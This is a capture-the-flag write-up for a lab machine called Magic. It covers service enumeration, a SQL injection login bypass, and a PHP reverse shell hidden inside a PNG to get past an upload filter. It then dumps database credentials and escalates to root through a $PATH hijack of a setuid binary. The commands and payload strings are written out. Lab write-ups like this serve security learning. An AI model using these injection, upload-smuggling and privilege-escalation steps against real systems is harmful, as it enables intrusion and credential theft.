Jump Ahead: Enum – Initial Shell – User – Root
To solve this machine, we begin by enumerating exposed services – finding ports
80 open. On the webserver, we find a login form vulnerable to SQLi that redirects us to an image uploader. We smuggle a reverse shell to the webserver, and gain access as
www-data. Looking around the machine, we find credentials that allow us to pillage the database – gaining the system password for the
theseus user. Logging in as
theseus, we gain
theseus, we enumerate our groups, and what files we can access/run. We find
/bin/sysinfo which also has the setuid bit set on owner (root). Exploiting a $PATH vulnerability in the binary allows us to hijack program execution, and get a root shell. We now have access to read
Like all machines, we begin by enumerating exposed services using nmap – finding only ports
$ nmap -v -p- --min-rate 3000 $RHOST [...] $ nmap -A -oA scans/nmap/tcp-all -p 22,80 $RHOST # Nmap 7.80 scan initiated Sun Jun 7 12:56:15 2020 as: nmap -A -oA scans/nmap/tcp-all -p 22,80 10.10.10.185 Nmap scan report for 10.10.10.185 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA) | 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA) |_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Magic Portfolio Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jun 7 12:56:24 2020 -- 1 IP address (1 host up) scanned in 9.22 seconds
Next, we enumerate the web server using gobuster and find a few files we have access to read.
$ gobuster dir -u 10.10.10.185 -w /opt/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt -o scans/web/gobuster80-rmf.txt [...] /login.php (Status: 200) /index.php (Status: 200) /. (Status: 200)
http://10.10.10.185/login.php, we are presented with a login form. We try the traditional
' or 1=1-- SQL injection string, however, we notice the input field does not allow for spaces to be typed. To bypass this limitation, we copy and paste the string into the field. For conciseness, we put it in both the username and password fields. Having done so and clicking “Login”, we are now redirected to
Although the upload form states “Select Image to Upload”, we attempt to upload a
.php file to see if uploading a reverse shell would be straightforward. Unfortunately, we are denied the upload with an error message that only JPG, JPEG, and PNG files are allowed.
To evade this filter (likely a MIME-check), we can attempt to smuggle our reverse shell within a valid image. To do this, we can cat our reverse shell after the image, and save them both to a new file. To get the webserver to run the php, we should have a
.php extension in the file name as well.
### revshell.php is just the laudanum php-reverse-shell.php $ cat kittens.png revshell.php > shellme.php.png
Next, we try to upload the new file, which proves successful.
To execute the reverse shell, we go to the webserver index page, and look through the source code for where the images are uploaded. One directory path that we see is
images/uploads/. This may be where our reverse shell was uploaded to. Starting our netcat listener, and navigating to
http://10.10.10.185/images/uploads/shellme.php.png gives us a reverse shell as the
To make things a little easier, we upgrade to a Meterpreter reverse shell.
Having gained access to the web server, we begin enumeration. From the
/home directory, we see that
theseus is a valid system user. Looking at the webserver files in
/var/www/Magic, we find database credentials for the
theseus user. Running netstat from our Meterpreter shell, we also see that MySQL is running locally on the webserver. To make it easy to connect to the database server, we will create a port forward through Meterpreter.
Once our port forward is created, we use the discovered credentials to connect to the database. Once connected, we show all tables, then dump the
$ mysql -h 127.0.0.1 -u theseus -p Magic MySQL> show tables; MySQL> select * from login;
Doing so, we get another potential password. Trying the password on the system, we are able to log in as
theseus. We now have access to read
Having gained access to the machine as
theseus, we begin our enumeration by checking our groups by running id. Doing so, we see that we are a part of a group called
users. Next, we search for files that this group owns. Doing so, we find
/bin/sysinfo, which is owned by
root and has the SetUID bit set.
$ find / -group users -ls 2>/dev/null
Running the binary, we see an output similar to running systeminfo on Windows. Next, we want to see all library calls the binary makes. To do this, we use ltrace. There is a lot of output, however, we see that the binary calls other programs on the system via the
popen() call. To cut back on the noise, and filter only those calls, we pipe the output to grep. Doing so, we see 4 programs that /bin/sysinfo runs.
As none of the 4 programs are being called with an absolute path, we should be able to hijack code execution. To do this, we set our current directory to lead in the $PATH variable. Then we can upload a reverse shell to our current working directory, and name it as one of the binaries. To execute our reverse shell, all we have to do is run /bin/sysinfo. Once our reverse shell runs, we will have access to
#Upload reverse shell to your current working directory $ export PATH=`pwd`:$PATH $ /bin/sysinfo
For my binary, I chose to hijack cat, as my reverse shell was Meterpreter, which takes commands line options, and wouldn’t run correctly due to this*
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!